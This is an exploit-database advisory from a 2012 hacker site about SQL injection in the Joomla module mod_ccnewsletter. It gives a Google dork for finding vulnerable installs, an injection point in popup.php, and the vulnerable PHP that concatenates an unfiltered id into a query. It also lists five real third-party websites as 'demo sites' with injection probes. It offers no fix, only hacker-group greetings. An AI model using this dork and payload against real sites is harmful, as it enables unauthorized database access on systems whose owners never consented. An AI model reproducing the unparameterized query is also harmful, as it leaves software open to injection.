1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 3 3 3 _ __ __ ________ __ __ 3 7 /' \ /'__`\ /'__`\ /\_____ \ /\ \/\ \ 7 1 /\_, \/\_\L\ \ /\_\L\ \\/___//'/' \_\ \ \ \____ 1 3 \/_/\ \/_/_\_<_\/_/_\_<_ /' /' /'_` \ \ '__`\ 3 3 \ \ \/\ \L\ \ /\ \L\ \ /' /' /\ \L\ \ \ \L\ \ 3 7 \ \_\ \____/ \ \____//\_/ \ \___,_\ \_,__/ 7 1 \/_/\/___/ \/___/ \// \/__,_ /\/___/ 1 3 >> Exploit database separated by exploit 3 3 type (local, remote, DoS, etc.) 3 7 7 1 [+] Site : 1337db.com 1 3 [+] Support e-mail : submit[at]1337db.com 3 3 3 7 ########################################### 7 1 I'm E1nzte1N 1337 Member from 1337 DataBase 1 3 ########################################### 3 3 3 7-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-7 ============================================================= -={ Joomla Module (mod_ccnewsletter) Sql Injection Vulnerablity }=- ============================================================= ######################################################################################################## # Exploit Title : Joomla Module (mod_ccnewsletter) Sql Injection Vulnerablity # Software Link : http://www.joomlaos.de/option,com_remository/Itemid,41/func,finishdown/id,4197.html # Version : 1.0.7 # Date : 23/04/2012 # Author : E1nzte1N # E-mail : bluescreenfx@gmail.com # Category : webapps # Google dork : inurl:/modules/mod_ccnewsletter/helper/popup.php # Tested on : Windows ######################################################################################################## #Exploit/p0c : http://localhost/modules/mod_ccnewsletter/helper/popup.php?id=[SQLi] ######################################################################################################## Bug on file popup.php, in line >>$content_id = JRequest::getVar( 'id', '', 'get', 'string'); ======================================================================================================== if(!isset($mainframe)) $mainframe =& JFactory::getApplication('site'); $db =& JFactory::getDBO(); $content_id = JRequest::getVar( 'id', '', 'get', 'string'); <<= request string value "id" without filtering. $query = 'SELECT * FROM #__content WHERE id ='.$content_id; $db->setQuery( $query ); $row = $db->loadObject(); ========================================================================================================= # Demo Sites : => http://www.trirunners.com/modules/mod_ccnewsletter/helper/popup.php?id=71' => http://www.valdesi.eu/modules/mod_ccnewsletter/helper/popup.php?id=109' => http://www.kvalis.com/modules/mod_ccnewsletter/helper/popup.php?id=588' => http://www.fanticostruzioni.com/modules/mod_ccnewsletter/helper/popup.php?id=6' => http://www.cd-dvd-klastor.com/modules/mod_ccnewsletter/helper/popup.php?id=63' ######################################################################################################## ==>> Special Thanks <<== ...:::' 1337day Inj3ct0r TEAM ':::... [ All Staff & 31337 Member Inj3ct0r TEAM ] , And All Inj3ct0r Fans & All Hacktivist,,, :-) ############################################################################ [ Me @ SRAGEN, Bumi Sukowati, 23 April 2012 @ 13:47 PM. ] [ Inj3ct0r | PacketStromSecurity | Exploit-ID | Devilzc0de | Hacker-Newbie ] ############################################################################ # 1337day.com [2012-04-23]